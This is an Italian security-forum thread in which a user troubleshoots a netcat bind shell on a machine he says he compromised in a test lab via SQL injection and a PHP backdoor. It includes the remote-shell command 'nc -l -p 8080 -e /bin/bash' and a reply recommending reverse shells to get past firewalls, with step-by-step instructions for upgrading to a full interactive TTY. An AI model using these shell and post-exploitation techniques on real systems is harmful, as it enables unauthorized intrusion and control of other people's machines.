Domanda Risolto Problema con netcat

Cutl4ss

Utente Electrum
25 Giugno 2017
344
10
53
116
"Can't grab 0.0.0.0:8080 with bind" quando metto in ascolto netcat con il seguente comando:
Codice:
nc -l -p 8080 -e /bin/bash
Qualche suggerimento?
 
Ultima modifica:
Un po' di domande:

  1. Su che sistema operativo stai lavorando?
  2. Potresti riportare il comando preciso che hai utilizzato per controllare con netstat che non ci siano servizi in ascolto sulla stessa porta?
  3. Netstat l'hai eseguito con privilegi di amministratore? (o di sudoer, nel caso di Linux)
Messaggio unito automaticamente:

Fra l'altro, la sintassi che hai utilizzato mi sembra errata. Non uso netcat da un bel po', ma guardando il man al volo (cosa che andrebbe sempre fatta) trovo questo:

-p source_port
Specifies the source port nc should use, subject to privilege restrictions and availability. It is an error to use this option in conjunction with the -l option.
 
Ho risolto settando l'ip della macchina server nel file 000-default.conf. Adesso riesco a connettermi all'host e a ottenere una bind shell.
 
Non sto capendo, cosa c'entra l'ip della macchina in un file di configurazione di Apache con l'utilizzo di netcat? Stai dicendo che quindi tu volevi connetterti ad un'altra macchina con netcat, non metterti in ascolto e bindare? C'è troppa confusione in questo post.
 
Non sto capendo, cosa c'entra l'ip della macchina in un file di configurazione di Apache con l'utilizzo di netcat?
Perché c'era una problema di configurazione nel server che ho impostato per il test.
Non sto capendo, cosa c'entra l'ip della macchina in un file di configurazione di Apache con l'utilizzo di netcat? Stai dicendo che quindi tu volevi connetterti ad un'altra macchina con netcat, non metterti in ascolto e bindare? C'è troppa confusione in questo post.
Sì, scusa, sono stato poco chiaro: in pratica ho exploitato la macchina caricandovi una backdoor in php. Ora voglio ottenere una full TTY con netcat e per collegarmi al target ho usato questi comandi:
Vittima:
Codice:
nc -l -p 8080 -e /bin/bash
Attaccante:
Codice:
nc [ip-target] [port]
 
Ah ok, adesso è più chiaro :D

Giusto due piccole considerazioni:

1. - In molti casi ti capiterà di trovare macchine con delle regole firewall per le connessioni in ingresso, ti conviene sempre utilizzare una reverse shell, piuttosto che una bind;

2. - Con netcat purtroppo non avrai una full TTY; ti sembrerà così inizialmente, ma noterai qualcosa di strano non appena comincerai ad editare file, utilizzare l'autocomplete di bash e provare a vedere la history. Se c'è python (2 o 3, poco importa) installato sulla macchina (90% dei casi), puoi creare una full tty effettiva:

  • Stabilisci una reverse shell connection con netcat (o come preferisci);
  • All'interno della connessione, spawni una shell con python: python -c 'import pty; pty.spawn("/bin/bash");'
  • Fatto questo, metti la connessione in background con CTRL-Z;
  • Lanci il comando stty -a e prendi nota del numero di colonne e righe;
  • Lanci il comando stty raw -echo
  • Riporti la connessione in foreground con il comando fg (occhio che quando scriverai il comando, non avrai output sul terminale);
  • Resetti il terminale lanciando il comando reset
  • Esporta la variabile SHELL con il valore "bash" export SHELL=bash
  • Esporta la variabile TERM con il valore "screen" export TERM=screen
  • Imposti la tty con il numero di righe e colonne che hai preso in precedenza stty rows <num> columns <cols>
  • Voilà, una full TTY!
 
In molti casi ti capiterà di trovare macchine con delle regole firewall per le connessioni in ingresso, ti conviene sempre utilizzare una reverse shell, piuttosto che una bind;
Sì, lo so, infatti era solo una simulazione di come è possibile ottenere una web shell sfruttando le sql injection, in modo da bypassare l'autenticazione nel pannello amministrativo.
Con netcat purtroppo non avrai una full TTY; ti sembrerà così inizialmente, ma noterai qualcosa di strano non appena comincerai ad editare file, utilizzare l'autocomplete di bash e provare a vedere la history.
Sto usando una versione customizzata di netcat che setta in automatico tutte le variabili d'ambiente non appena ti colleghi al target.
 
  • Mi piace
Reazioni: HellIn